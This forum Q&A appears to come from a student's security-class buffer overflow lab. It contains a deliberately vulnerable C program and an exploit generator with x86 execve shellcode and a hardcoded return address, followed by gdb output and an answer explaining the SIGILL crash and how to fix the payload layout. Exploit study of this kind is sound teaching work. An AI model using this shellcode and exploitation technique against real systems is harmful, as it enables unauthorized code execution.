Getting SIGILL when trying to execute buffer overflow attack

Question

I'm working on my buffer overflow project for my security class, I think I have everything set up right but when I run it I get:

Program received signal SIGILL, Illegal Instruction.
0x08048500 in main(argc=4854718, argv=0x0804b008) at stack.c:22
22       fread(str,sizeof(char),517,badfile);

Heres stack.c

int bof(char *str) 
{
    char buffer[12]; 
    /* The following statement has a buffer overflow problem */ 
    strcpy(buffer, str); 
    return 1; 
} 

int main(int argc, char **argv) 
{ 
    char str[517]; 
    FILE *badfile; 
    badfile = fopen("badfile", "r"); 
    fread(str, sizeof(char), 517, badfile); 
    bof(str); 
    printf("Returned Properly\n"); 
    return 1; 
}

here is exploit.c

char code[]=

"\x31\xc0"                      // xorl         %eax,%eax

"\x50"                          // pushl        %eax

"\x68\x6e\x2f\x73\x68"          // pushl        $0x68732f6e

"\x68\x2f\x2f\x62\x69"          // pushl        $0x69622f2f

"\x89\xe3"                      // movl         %esp,%ebx

"\x99"                          // cltd

"\x52"                          // pushl        %edx

"\x53"                          // pushl        %ebx

"\x89\xe1"                      // movl         %esp,%ecx

"\xb0\x0b"                      // movb         $0xb,%al

"\xcd\x80"                      // int          $0x80

;

char retaddr[] = "\x70\xF2\xFF\xBF";

void main(int argc, char **argv)
{
    char strr[517];
    strr[0] = 'Z';
    strr[1] = 0;
    strr[2] = '\x00';
    char buffer[517];
    FILE *badfile;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(buffer, 0x90, 517);

    /* You need to fill the buffer with appropriate contents here */
    //memcpy(buffer, "EGG=", 4);

    memcpy(buffer, code, 24);

    memcpy(buffer+20,retaddr,4);

    memcpy(buffer+24,"\x00\x00\x00\x00",4);


    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer,517,1,badfile);
    fclose(badfile);    
} 

Here is the stack at runtime. Starting program: /home/john/stack

Breakpoint 1, bof (
str=0xbffff2b7 "1\300Phn/shh//bi\211\343\231RS\211\341p\362\377\277")
at stack.c:13
13      strcpy(buffer, str);
(gdb) x/12xw $esp
0xbffff270: 0x00000205  0xbffff298  0x004a13be  0x0804b008
0xbffff280: 0xbffff2b7  0x00000205  0xb7fef6c0  0x00584ff4
0xbffff290: 0x00000000  0x00000000  0xbffff4c8  0x0804850f
(gdb) s
14      return 1;
(gdb) x/12xw $esp
0xbffff270: 0xbffff284  0xbffff2b7  0x004a13be  0x0804b008
0xbffff280: 0xbffff2b7  0x6850c031  0x68732f6e  0x622f2f68
0xbffff290: 0x99e38969  0xe1895352  0xbffff270  0x08048500
(gdb) c
Continuing.

Any idea why I'm getting SIGILL?

Answer 1

Because you're executing illegal code. In your exploit.c, you're overwriting offsets 20-23 with the return address -- those bytes were previously the b0 0b cd 80 corresponding to the last two mov $0xb,%al and int $0x80 instructions. The zero bytes you put in there are illegal code.

Since the return address has to go at that specific offset for this target, you need to modify your shell code not to use that data. I'd suggest either moving the shell code to after that offset and pointing the return address there, or putting in a jump over the return address so that the processor doesn't try to execute it.